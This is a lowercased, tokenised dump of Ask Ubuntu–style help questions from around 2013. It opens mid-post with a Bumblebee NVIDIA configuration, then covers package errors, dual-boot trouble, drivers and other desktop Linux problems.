noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # list of paths which are searched for the primus libgl.so.1 when using # the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-319-updates pmmethod=auto # colon-separated path to the nvidia libraries librarypath=//usr/lib/nvidia-319-updates : /usr/lib32/nvidia-319-updates # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-319-updates/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau and this is the xorg.conf.nvidia : section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' option `` autoaddgpu '' `` false '' endsection section `` device '' identifier `` discretenvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' # if the x server does not automatically detect your vga device , # you can manually set it here . # to get the busid prop , run `lspci | egrep 'vga|3d'` and input the data # as you see in the commented example . # this setting may be needed in some platforms with more than one # nvidia card , which may confuse the proprietary driver ( e.g. , # trying to take ownership of the wrong device ) . also needed on ubuntu 13.04 . busid `` pci:01:00:0 '' # setting probeallgpus to false prevents the new proprietary driver # instance spawned to try to control the integrated graphics card , # which is already being managed outside bumblebee . # this option does n't hurt and it is required on platforms running # more than one nvidia graphics card with the proprietary driver . # ( e.g . macbook pro pre-2010 with nvidia 9400m + 9600m gt ) . # if this option is not set , the new xorg may blacken the screen and # render it unusable ( unless you have some way to run killall xorg ) . option `` probeallgpus '' `` false '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` usedisplaydevice '' `` none '' endsection any help will be appreciated , thanks penguin bros ! !
381806	ca n't reinstall ubuntu-desktop due to strange error with printer-driver-pnm2ppa	i 've been trying to fix this error for hours with no avail . my apt-get seems to be paralyzed by an error i 'm receiving with this printer-driver-pnm2ppa . i do n't actually need the driver but it 's a dependency for a seemingly infinite amount of things . any help would be much appreciated . sudo apt-get install ubuntu-desktop reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : ubuntu-desktop 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 4,270 b of archives . after this operation , 60.4 kb of additional disk space will be used . get:1 http : //us.archive.ubuntu.com/ubuntu/ saucy/main ubuntu-desktop i386 1.307 [ 4,270 b ] fetched 4,270 b in 0s ( 13.7 kb/s ) selecting previously unselected package ubuntu-desktop . ( reading database ... 403424 files and directories currently installed . ) unpacking ubuntu-desktop ( from ... /ubuntu-desktop_1.307_i386.deb ) ... processing triggers for libc-bin ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.11.0-13-generic processing triggers for ca-certificates ... updating certificates in /etc/ssl/certs ... 0 added , 0 removed ; done . running hooks in /etc/ca-certificates/update.d ... . done . done . setting up printer-driver-pnm2ppa ( 1.13+nondbs-0ubuntu3 ) ... /var/lib/dpkg/info/printer-driver-pnm2ppa.postinst : 19 : /var/lib/dpkg/info/printer- driver-pnm2ppa.postinst : install : not found dpkg : error processing printer-driver-pnm2ppa ( -- configure ) : subprocess installed post-installation script returned error exit status 127 dpkg : dependency problems prevent configuration of ubuntu-desktop : ubuntu-desktop depends on printer-driver-pnm2ppa ; however : package printer-driver-pnm2ppa is not configured yet . dpkg : error processing ubuntu-desktop ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : printer-driver-pnm2ppa ubuntu-desktop e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit 1 : by request , adding output of sudo apt-get -- reinstall install printer-driver-pnm2ppa reading package lists ... done building dependency tree reading state information ... done suggested packages : magicfilter apsfilter the following new packages will be installed : printer-driver-pnm2ppa 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/210 kb of archives . after this operation , 772 kb of additional disk space will be used . preconfiguring packages ... selecting previously unselected package printer-driver-pnm2ppa . ( reading database ... 403352 files and directories currently installed . ) unpacking printer-driver-pnm2ppa ( from ... /printer-driver-pnm2ppa_1.13+nondbs-0ubuntu3_i386.deb ) ... processing triggers for man-db ... processing triggers for doc-base ... processing 3 changed doc-base files ... registering documents with scrollkeeper ... setting up printer-driver-pnm2ppa ( 1.13+nondbs-0ubuntu3 ) ... /var/lib/dpkg/info/printer-driver-pnm2ppa.postinst : 19 : /var/lib/dpkg/info/printer- driver-pnm2ppa.postinst : install : not found dpkg : error processing printer-driver-pnm2ppa ( -- configure ) : subprocess installed post-installation script returned error exit status 127 no apport report written because maxreports is reached already errors were encountered while processing : printer-driver-pnm2ppa e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit 2 : sudo apt-get purge printer-driver-pnm2ppa & & sudo rm /var/lib/dpkg/info/printer- driver-pnm2ppa* reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : printer-driver-pnm2ppa* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 772 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 403423 files and directories currently installed . ) removing printer-driver-pnm2ppa ... purging configuration files for printer-driver-pnm2ppa ... processing triggers for doc-base ... processing 3 removed doc-base files ... registering documents with scrollkeeper ... processing triggers for man-db ... rm : can not remove â/var/lib/dpkg/info/printer-driver-pnm2ppa*â : no such file or directory edit 3 : still not working . going to report the error to launchpad . sudo apt-get install printer-driver-pnm2ppa reading package lists ... done building dependency tree reading state information ... done suggested packages : magicfilter apsfilter the following new packages will be installed : printer-driver-pnm2ppa 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/210 kb of archives . after this operation , 772 kb of additional disk space will be used . preconfiguring packages ... selecting previously unselected package printer-driver-pnm2ppa . ( reading database ... 403352 files and directories currently installed . ) unpacking printer-driver-pnm2ppa ( from ... /printer-driver-pnm2ppa_1.13+nondbs- 0ubuntu3_i386.deb ) ... processing triggers for man-db ... processing triggers for doc-base ... processing 3 added doc-base files ... registering documents with scrollkeeper ... setting up printer-driver-pnm2ppa ( 1.13+nondbs-0ubuntu3 ) ... /var/lib/dpkg/info/printer-driver-pnm2ppa.postinst : 19 : /var/lib/dpkg/info/printer-driver-pnm2ppa.postinst : install : not found dpkg : error processing printer-driver-pnm2ppa ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : printer-driver-pnm2ppa e : sub-process /usr/bin/dpkg returned an error code ( 1 )
381808	ubuntu 12.04 does not recognize external speakers	my external usb speakers ( logitech ) started to fail ( vibrating noise ) , so i got another pair of logitech external speakers ( connector is the light green plug - not usb this time ) . when i plug headphones into both green audio jacks on my machine , i hear perfect sound . when i plug the new speakers into another computer , the speakers emit perfect sound . so there does not appear to be a problem with my sound card , nor with the external speakers . clicking on the speaker icon in the top right - > sound settings - > sound , in the 'play sound through ' box , no option exists for my external speakers . the two options are : digital output ( s/pdif ) built-in audio headphones built-in audio and when i run aplay -l : mybox : ~ $ aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : ad198x analog [ ad198x analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : ad198x digital [ ad198x digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i have also tried rebooting with and without the speakers connected to the jack . speakers are logitech s-0152a . advice explaining how to resolve this issue would be greatly appreciated . update 2013-11-27 speakers spontaneously started working - i did n't do anything . now the sound card and speakers both play sound at the same time , but that issue has already been covered by another post in this forum and should be easy to fix .
381811	ati 6770 on ubuntu 13.10 with xfce	i am having problems getting the proprietary drivers to work with xfce . i can load gnome sessions but not xfce . any insight ? .. after i installed the drivers , i had to alt+tab over to a text login and install gnome , i cant figure out why xfce is hanging up and gnome is n't , or why i am getting new errors on session startup.. this is a new fresh install with out any copied over files from my old home , i had this trouble before but i thought it might have something to do with the old home dir.. any help is appreciated.. aaron
381815	change skype 's colors to black	i 'm curious if there is a way in ubuntu that i can change skype 's theme to black . i 've been looking all over the internet until i finally found this operating system , and i may just download and use it , if it can help me with my skype problem .
381818	dual boot with windows 7 no boot options	i used a live cd to install ubuntu 12 , it went well and told me to remove the install device and reboot . but it just boots win7 , i get no option to launch ubuntu . if there are more informations needed , i 'll provide them .
381819	netflix-desktop is stuck on `` auto '' resolution . how do i make it stay on `` low '' ?	when i log onto netflix-desktop i click on the menu on the top right '' my account '' '' playback settings '' '' low '' , under data usage . `` save '' this setting does not save . i can open the menu back up and find that it 's still stuck on `` auto '' . and when i play something , it looks like the resolution is shifting from high to low res . a little background info : i have a netbook that has to play most online videos on low quality to play smoothly . this is also true for netflix-desktop ; it plays smoothly when it 's on low quality and very choppy when on high quality . thank you !
381820	what does the `` -f '' mean in dconf ?	for example , i can reset the gnome fallback panel with dconf reset -f /org/gnome/gnome-panel/ the only thing i do n't understand is the `` -f '' part . can someone tell me what is does ? or is it just there for no reason ? google does n't help me , it just shows results that are n't very similar with my question . if i need to add anything else , please let me know .
381826	fixing broken software update	when i try to run software updater , it tells me that i do not have the required permissions without even asking for the password . this has been an issue since an upgrade of my system to saucy was interrupted , but i have followed the instructions what ( specifically ) could have gone wrong , and how can i fix it ?
381828	mouse pointer invisible after reinstalling unity on top of gnome in ubuntu 13.10	i am using ubuntu 13.10 . i usually use cinnamon and gnome shell and had removed unity and related packages . i re-installed unity , and everything works fine except that the mouse pointer is no longer visible . it would help if anyone can suggest some ideas to resolve the issue . i have a dell xps 15z l502x with a geforce gt 540m card . i am also using gnome shell 3.10.1 and cinnamon 2.0.12 .
381830	newly installed ubuntu : number keys are not working on keyboard	i just installed ubuntu 12 on my dell laptop with windows , i had to mess around a bit to get the wifi going and now my keyboard is not working . when i press the keys nothing appears but the keys feel fine . i have checked and number lock is off . this is the top set of number keys and not a number pad . it starts at the number 1 key , then goes across . 5 key and 6 key work but the rest of the numbers up to - do not . i have read some other posts and tried some things but i have not been able to resolve . i am guessing this is something with the computer and not the actual keyboard itself since it has never had this problem before . how to fix this issue ? edit : the keyboard layout may be the culprit , does anyone know what layouts are used for dell laptops without num pad ?
381834	c compiling issue : fatal error : conio.h : no such file or directory	when i compile a c program it show : gcc gr.c gr.c:1:18 : fatal error : conio.h : no such file or directory compilation terminated .
381835	windows 7 wo n't boot after installing ubuntu	i realize that there have been similar questions posted around here and there , but none of the solutions seem to work for me . what i did : i have completely formatted my disk and divided it into three partitions using a third party partitioning software : windows 7 partition ( ntfs ) ubuntu partitions ( ntfs , forgot to switch it to ext4 ) data partition ( ntfs ) then i installed windows on the first partition , then ubuntu 13.10 on the second . the second partition was formatted to ext4 by the ubuntu installation program . what happened : after installing ubuntu , windows 7 simply wo n't boot . to be exact , it displays the message about a failure and asks me to choose between trying to repair the system or normally booting - neither works , repair fills 2 progress bars then hangs and normal boot displays `` starting windows '' but the coloured orbs do n't appear at all . what i 've tried so far : boot repair ubuntu application - did n't help at all repairing windows with the original disk - worked , windows booted flawlessly once and then the situation repeated after the first restart . the same thing happens every time i try to repair it - works only for one boot . edit : i tried it now and it did n't work , so i guess it only worked twice . what i am asking about : since the windows disc 's repair works , i hope that my windows can still be saved ( i 've spent a couple hours setting everything up ) , although i have all my data backed up so it wo n't be a tragedy if i would have to reinstall it . but then i would like to know what can i do to prevent similar errors ( in another question i learned that windows replaces grub with its own bootloader ) . to sum up : can i fix my windows installation and if so , how ? if not , what should i do when installing windows alongside ubuntu to make both systems boot correctly ?
381837	oops ! there is a problem running this software , unable to locate the program	i am using huawei plug and play ( auto run ) data card . intially it was working fine for my ubuntu 13.04 . then i tried use the another huawei data card that requires software installation . hence i installed software to use data card . after that i used my plug and play ( auto run ) data card , but it is not working and it giving the error as this . oops ! there is a problem running this software , unable to locate the program how to solve this issue ?
381838	installed ubuntu , now i get `` fatal err . not os detected	i installed ubuntu . now i get : '' fatal err . not os detected . i cant boot from dvd either what can i do ?
381840	ran auto-updates on ubnutu 12.04 and grub2 lost windows 7	i have a dual boot system with two hard drives -- one for windows 7 and the other for ubuntu ( now 3.5.0-43 ) . i ran the most recent ubuntu updates and lost my windows 7 entry in grub . i 've attempted running `` sudo update-grub2 '' , os-prober , manually adding the `` 40_custom '' entry in /etc/grub.d/ , and surfing around for a solution . so far , it seems that nobody else has solved this problem . i ran boot-repair and created the past link -- http : //paste.ubuntu.com/6466121/ . another oddity is that i am not able to do anything other than generate the `` bootinfo '' using boot-repair . i only get the `` about '' , `` quit '' , and `` create a bootinfo summary ( to get help by email or forum ) '' when i run the application . i appreciate any information for how i might be able to re-add this entry ... and how i can prevent future updates/upgrades from breaking this configuration again . thanks !
381843	live usb `` check disk for defects '' returns defects	i 'm trying to use a live usb to dual-boot ubuntu 13.10 and windows 8.1 . i made the disk with pendrivelinux ( per instructions on the ubuntu website ) . it all completed successfully , i checked the md5sum of the .iso file and it was correct . when i restarted my computer and booted off the flash drive , i ran `` check disk for defects '' and it ran properly , but returned that my disk had 2 defects . however , it would n't tell me what the defects were . it seemed to be checking files on the usb device itself . but from googling the problem some people say it checks the usb and others say it 's checking the computer 's hdd . i re-created the usb drive and had the same error . i 'm wondering what this actually means , and if it 's safe to install ubuntu . i 'm writing this on the ubuntu desktop ( without install ) and it seems to be working fine . how can i solve this ?
381844	my brand new dell vostro got very slow after two days of usage , what can i do to fix it ?	i bought a dell vostro laptop with pre innstall ubuntu 12.04 . which was working very well but after 2 days it got slower . what should i do to make it fast as earlier ?
381846	what happened to the connect-server dialog , other menus ?	in 12.04 ( or was it 10.04 ? ) there was a very handy connect-to-server function in nautilus . it let you select ftp/sftp , and a few other options , gave a username/password like any good ftp client . now however , there is only a textbox . why was this changed , and why is there only one menu with just a few options ? are there any ways to make it use the old style ?
381848	ubuntu 13.10 usb 3.0 bios settings	i 'm trying to optimize my hardware for ubuntu 13.10 . box is zotac zbox id85-u . in the bios settings : should xhci hand-off and ehci hand-off be enabled or disabled ? should port 60/64 emulation be enabled or disabled ?
381849	ubuntu extend desktop mode [ acer 4732z ]	i have acer 4732z with ubuntu 13.10 installed . but i ca n't get how to make it to extend desktop mode when i plug a monitor to my notebook . i only can switch to monitor only laptop display only duplicate display and i ca n't make it to be `` extend desktop '' mode , but i do n't know , is it depends on my laptop hardware . may be if you do n't understand what i mean . the picture below is my windows 7 in extend desktop mode . how to fix this issue ?
381853	unable to install ubuntu ( any version ) on malibal lotus p150sm with nvidia gpu	i have an interesting situation . i have read that with two gpu 's in my laptop , i can not install ubuntu without disabling one of them first . this seems to be true , as i begin to boot from the usb key , the screen changes resolution to high-resolution and then freezes on the flashing . i can not get to the install menu or anything . the problem is that there is no way to disable a video card in my bios , the bios is extremely limited in scope . am i just plain out of luck or is there some workaround for this ( or is this not the problem at all ) ?
381855	new ubuntu install ( 12.04.3 ) on dell vostro 1510 no wireless	the switch on the laptop is on . i know because the light comes on when i start windows xp . but when i boot ubuntu the light will not turn on . when i try to activate the drivers for wifi i get an error . ubuntu will not install the driver . i have worked with command lines before . what do i need to do to get ubuntu to turn on the wifi light when ubuntu boots up ?
381856	how to add or replace album art in rhythmbox ?	is there a way to add custom album art to a song or replace album album art of a song in rhythmbox .
381858	ubuntu installation error prefix	i 'm trying to install ubuntu 12.04 lts 64bit on my pc ( my os-windows 7 ) . i download the desktop iso file , mount it and followed the installation . when its over i reboot the pc , but while rebooting it shows a `` prefix error '' a it freezes . i searched for people with the same problem and it was sugested the following : -install iso master on ubuntu ( did it in a diferent pc ) -open de iso file with iso master -delete the ubuntu file in it and save the new file created in a different place i then mount it and install but it gives me the same error ... and it still creates a ubuntu file in my hard drive .
381860	where is the config file for the system monitor tool ?	somehow i managed to set the update interval to 0 in the system monitor tool config dialog . now the tool `` hangs '' when i try to change configuration . it seems appropriate to just wipe the config file . but where is it ? extra question : using the german ui , i always have trouble figuring out the actual name of s.th popping up with a german name on my screen . i was even comparing ps -u < name > before and after starting apps : (
381864	how to connect dlink dwm156 on ubuntu 12.04lts ?	hi my system config are : dell inspiron n4010 intel i3 4gb ram 500gb hdd dual boot windows 7 ultimate 64 bit and ubuntu 12.04lts 32 bit dlink dwm-156 h/w ver : a7 firmware : a7.0.1in lsusb gives following after i insert datacard lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 013 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 001 device 003 : id 0c45:641d microdia 1.3 mpixel integrated webcam bus 002 device 004 : id 2001 : a706 d-link corp . bus 001 device 014 : id 413c:8161 dell computer corp . integrated keyboard bus 001 device 015 : id 413c:8162 dell computer corp . integrated touchpad [ synaptics ] bus 001 device 016 : id 413c:8160 dell computer corp. wireless 365 bluetooth but datacard not get detected in network connection please help me . i am newbie in ubuntu ?
381866	ubuntu wo n't recognize usb	i just installed ubuntu onto one of my computer to try to learn linux . i 'm having problem trying to get the computer to recognize my usb . i plugged the usb in and nothing happened , went to the home folder and i do n't see anything . when i try to run sudo fdisk -1 , it says invalid option help anyone ?
381867	how to enable two nic ubuntu server	i 'm a newbie with ubuntu server . please help me . i 'm running ubuntu server 12.x . i 'm having a hard configuring my my server with 2 nic . the first nic is connected via a router ( internet ) . the second nic is connected via lan ( local user ) . the first nic ( eth0 ) can go out the internet , ping success via google.com , yahoo.com , and etc . while 2nd nic ( eth1 ) is unable to ping local ip which where it was connected . error says that : failed to bring up eth1 . this is the .image how to solve this issue ?
381870	best way to install ubuntu on asus eee pc 901 with 4gb boot slc and 16gb mlc drive	the 4gb is faster , but the 16gb has the space . what is the best way to install while taking advantage of the strengths of both . i have it installed on the 4gb , but worthless because i ca n't install apps , or upgrade . is there a way to put the apps drive on 16gb , but use 4gb for booting ?
381872	why do sysstat and top seem to give completely different ram statistics ?	i 'm using ubuntu to run a minecraft server , and i 've been having memory usage problems lately , so i set up sysstat to log usage data every 10 minutes . however , i 've been noticing some major inconsistencies between the readouts i get from sysstat and top . for example , here is a sysstat entry ( memory ) : 12:00:01 am kbmemfree kbmemused % memused kbbuffers kbcached kbcommit % commit 12:40:01 am 3244352 813524 20.05 34192 95664 766952 18.90 and here is a readout from top , taken within 10 seconds of the above entry : pid user pr ni virt res shr s % cpu % mem time+ command 1291 root 20 0 3758m 568m 12m s 39 14.3 3:43.08 java 1 root 20 0 23712 1832 1232 s 0 0.0 0:00.50 init 2 root 20 0 0 0 0 s 0 0.0 0:00.01 kthreadd 3 root rt 0 0 0 0 s 0 0.0 0:00.01 migration/0 4 root 20 0 0 0 0 s 0 0.0 0:00.01 ksoftirqd/0 5 root rt 0 0 0 0 s 0 0.0 0:00.00 watchdog/0 6 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/1 7 root 20 0 0 0 0 s 0 0.0 0:00.02 ksoftirqd/1 8 root rt 0 0 0 0 s 0 0.0 0:00.00 watchdog/1 9 root 20 0 0 0 0 s 0 0.0 0:00.64 events/0 10 root 20 0 0 0 0 s 0 0.0 0:00.04 events/1 11 root 20 0 0 0 0 s 0 0.0 0:00.00 cpuset 12 root 20 0 0 0 0 s 0 0.0 0:00.00 khelper 13 root 20 0 0 0 0 s 0 0.0 0:00.00 netns 14 root 20 0 0 0 0 s 0 0.0 0:00.00 async/mgr at any given time , they seem to be way off from each other . i do n't have a full grasp on virtual vs resident , etc , but it seems strange that top has no output corresponding with the 813524 `` kbmemused '' from sysstat . the % memused is n't even close either . and s you can see , java is the only process taking any significant amount of memory .
381874	copy utuntu.iso to pc then intall it by a usb	as the title , how to install ubuntu previously copied in windows7 by a usb booter . thanks .
381875	what is the difference between / and // ?	i have been facing this wierd problem while trying to montor an ftp server . if i try to use ftp : //192.x.x.x/home/ $ user/output , the monitoring tool fails to pickup the folder . however , if i use ftp : //192.x.x.x//home/ $ user/output , then the ftp folder is picked up easily . so i want to know , what is the difference between / and // ?
381876	how to transfer chat conversation history of pidgin from one computer to another ?	i am moving to a new computer . is it possible to have all the chat history transferred from the old pc to the new one ?
381881	how to dual boot windows xp professional 32-bit with ubuntu 12.04.3 32-bit on a dell dimension 3100	i have windows xp professional 32-bit and i want to dual boot it with ubuntu . i had tried ubuntu and generally liked it but un-installed it because i did not have any way to get xp up again and i lost all my stuff through the install process . i ignored the stupid warning because i did not think i would care if i lost them.anyways , now . anyway , i want ubuntu . but dual-booted . so i wont have to re-install xp later by partitioning the hard drive and going through the 2-hour process . t his is my first ever dual-boot and its on a single-processor computer . i am not going through wubi so i wanted to make sure i do this right and not screw my computer . so would this be successful ? are there any other methods or precautions ?
381882	bleachbit increased disk space	i ran the bleachbit to clean up some of the apt data but there was `` free disk space '' option enabled which basically took more time to overwrite the data and now the disk space is increased . i dont know where this proxy file is stored which has increased the disk space size . i don ; t know what that file is called and how to delete it . any idea how to get rid of the file that is used by bleachbit to overwrite previously deleted files ?
381888	moka icon theme does n't apply correctly ubuntu 13.10 64bit	i am a fan of moka icon theme http : //www.omgubuntu.co.uk/2013/08/moka recently i had to reinstall ubuntu , and what was a surprise for me when i found out that my favourite theme does n't work anymore . when i add ppa and install icon theme , then through unity tweak tool apply it , this is what i get i 've tried to purge and reinstall the theme , simply restart the laptop , update icon cache , nothing . other themes , like numix icon theme , work perfectly fine and so did moka prior to ubuntu reinstall . by the way , i checked the ubuntu installation cd for errors , says 0 errors found so the image installed can not be corrupted . i searched the web for a solution , but it seems like this is not a common issue . any ideas would be appreciated . thank you
381889	install league of legends on ubuntu 12.04	i tried using the playonlinux but on the install screen the window would stop responding as soon as i clicked next to install . *edit it 's a laptop so i understand that it might be more difficult if at all possible . specs - http : //h10025.www1.hp.com/ewfrf/wc/document ? cc=us & lc=en & docname=c03482802
381890	which ubuntu for eee 901 - to run from sd card ?	i would like to use linux on our company laptop asus eee 901 - specs : cpu intel atom 1.66 ghz , ram 1 gb ddr2 display 8.9 inch , 1024x600 pixels as i am not allowed to modify the os and mbr i want to boot from sd slot and use some sdhc card ( can buy something like class 10 for better performance ) . i need some user friendly distro with gui . in first approach the laptop will serve as portable device for sorting and backup photos ( to external usb hdd ) and videos on holiday and occasional web access . so i need some usable image viewer , file manager and current web browser - capable to run on the screen only 600 pixels high ... and running a little bit more quickly than the windows : - ) what would you recommend ? lubuntu ? thanks
381892	printer and software for label printing ?	i 'm looking for a printer to print on adhesive product labels like these : http : //www.onlinelabels.com/ol996.htm ? src=dlc-28 are most printers compatible with ubuntu ? also what would be a good software to use for designing and printing the labels ?
381893	wine vs wine64 binary on 64-bit ubuntu	installing wine provides me with two wine binary executables that i can use to run programs with : wine and wine64 . how do they differ and where should i use each of them ?
381894	problem in upgrading : linux-header package 3.2.0.56 generic -pae : unmet dependencies	i tried upgrading multiple times , tried removing dependecies and also tried removing old kernels but it keeps on crashing saying no space in disk . i keep checking it says i have 1.1 gb free but it keeps crashing i can mount more than 1 drive now and it keeps adding more and more problems . the following packages have unmet dependencies : linux-headers-generic-pae : depends : linux-headers-3.2.0-56-generic-pae but it is not installed how to solve this issue ?
381897	13.10 how to remove completely facebook ?	i 've accidently installed facebook appplication , while accidently clicking on popup on firefox . i 've tried to remove it by deleting files from some directories , like /usr/share/applications , but it 's still there , and not only , now it causes firefox to crash . it happens when i launch facebook from browser , then this annoying thing launches , then firefox crushes . i 've removed .png icon of facebook , but it seems that it 'auto-generates ' ? ? it pops up when i connect to facebook on the browser . it starts to be scary and everytime i see the thing comes out , i want to puke or something . i 've tried search on google and tried this : sudo apt-get autoremove $ ( dpkg -l | grep facebook | awk ' { print $ 2 } ' | tr '\n ' ' ' ) and this removed my qjack install . hahaha . can someone please guide me to totally get rid of facebook ? i mean , completely . at least can somebody tell me where it is hidden ? additionally , it 'd be amazing if someone can tell us about the way to block facebook communicate with my machine . i bought brand new computer only a few days ago , after hard working months to save money . big part of this purchase is to enjoy the new version of ubuntu 13.10 and unity ... etc . all this joy is ruined by dirty spyware installed by forcing me to make mistake and insist to stay on my machine . please help me ! ! ! ! !
381901	what exactly is this shell script doing ?	i want to know what this shell script does . # ! /bin/sh for i in $ * do echo `` cat > $ i < < 'end of $ i ' '' cat $ i echo `` end of $ i '' done i mean , how is it working ? thanks !
381902	wake-on-lan power on the system but doesnt start ubuntu ?	i have followed these instructions everything worked pretty fine but i have got this problem when i run the wakeonlan mac-adress-of-the-machine it turns the system on but doesnt start the ubuntu 13.10 which is only os on this machine . just give a black blank screen on that nothing else . i have the system hp compaq pro 6300 mt looked into the bios and found in advanced post mode quickboot post messages disabled press the esc key for startup menu enabled option rom prompt enabled after power loss off post delay ( in seconds ) none remote wakeup boot source local hard drive //only option seems relevant factory recovery boot support disable bypass f1 prompt on configuration changes disabled changed the remote wakeup boot source option to the remote server but that doesnt do any good it tries to boot from network . i am not sure how to solve this problem . help !
381904	realtime signal processing	i 've been googling and searching for some time now , trying to figure out how to solve this , but since that did n't work out i thought i could find some help here . basically i want to use a signal that i 'm getting over the input of a sound card , apply filters or effects to it and then put it out again . all of this without first recording it . for instance , i 'm getting a sine-wave , delay it by a couple of ms and then put it out again . would that somehow be possible ? i 've been trying audacity and sweep , but got neither of them to work . thank you !
381905	why nova threadgroup can not access database ( nova-network ) ? `` ca n't connect to mysql server ''	i 've just build the basic version of the openstack and everything works but network . i 've installed nova-network but i 'm not sure if it 's correctly installed . i 've installed it on the compute node , because all other machines are virtualized . so i want it to deal with physical interfaces . the problem is that it fails to handle network : 2013-11-24 22:42:03.770 3570 error nova.openstack.common.threadgroup [ - ] ( operationalerror ) ( 2003 , `` ca n't connect to mysql server on 'controller.cloud.level2crm.com ' ( 113 ) '' ) none none this happens no matter what i set on configuration . why ? [ update ] it turns out that i was hit by this in my saucy installation , i 'm getting crazy with this bug : https : //bugs.launchpad.net/ubuntu/+source/qemu-kvm/+bug/997978
381908	prevent file manager to autostart on boot of kde	every time i boot my pc into kde ( usning dual boot with windows ) pcmanfm starts up in a new window . i would like it not to . i suspect this has to to with either the auto-start of dropbox or my automatic mounting of some ntfs drives . in system settings - > startup & shutdown - > autostart i 've got two posts . one for dropbox usning the command dropbox start -i and one shell-script for mounting montera.sh containing # mount documents /usr/bin/udisks -- mount /dev/disk/by-uuid/7e183c89183c4287 # mount programs /usr/bin/udisks -- mount /dev/disk/by-uuid/f65c2ded5c2da977d how do i prevent pcmanfm to auto start on boot ?
381910	simple scan takes forever to come up	i think it might be after the upgrade to 13.10 but simple scan is taking forever to respond . i looked with system monitor and it is wait_on_page or wait_on_buffer or a few other things . when i try to quit , generally i have to force quit . i tried to remove it and reinstall it , but that did n't help . it used to work very well and i do n't understand what went wrong . suppose i remove it again . is there something else which i need to kill ? any other suggestions on what to do to bring it back to life ? thanks , ilan
381916	how to log in to admin account from a non-admin account ?	i have an admin account with sudo privilege . i have created a new user but have n't given a sudo privilege to it . then i logged in as that new user : sudo -i -u foo_user now i want to get back to my admin account but can not do the same thing and get an error : foo_user @ ubuntu : ~ $ sudo -i -u admin1 [ sudo ] password for foo_user : foo_user is not in the sudoers file . this incident will be reported . so how is it possible to get back to my admin account now ?
381917	install 2 different application versions alongside	is it possible to install 2 different versions of application on the same os ? say , there is a monodevelop package in ubuntu repo , and there is a bleeding edge version in some ppa , being built daily . obviously , i do n't want to replace stable version with the bleeding edge one , but i 'd really like to try it out . is this possible to do ?
381920	install quickly on xubuntu	i installed quickly on xubuntu , used quickly create ubuntu-application testapp cd testapp and ran quickly run which showed me the application window . i ran quickly edit it worked after i installed gedit ( opens application files in gedit ) when i run quickly design glade opens and immediately closes . when i use the file manager to open testappwindow.ui in /data/ui i get this message : failed to load /home/uros/documents/testapp/data/ui/testappwindow.ui . the following required catalogs are unavailable : testapp_window how can i make glade open my application ui files ? thanks in advance . ( xubuntu 13.10 )
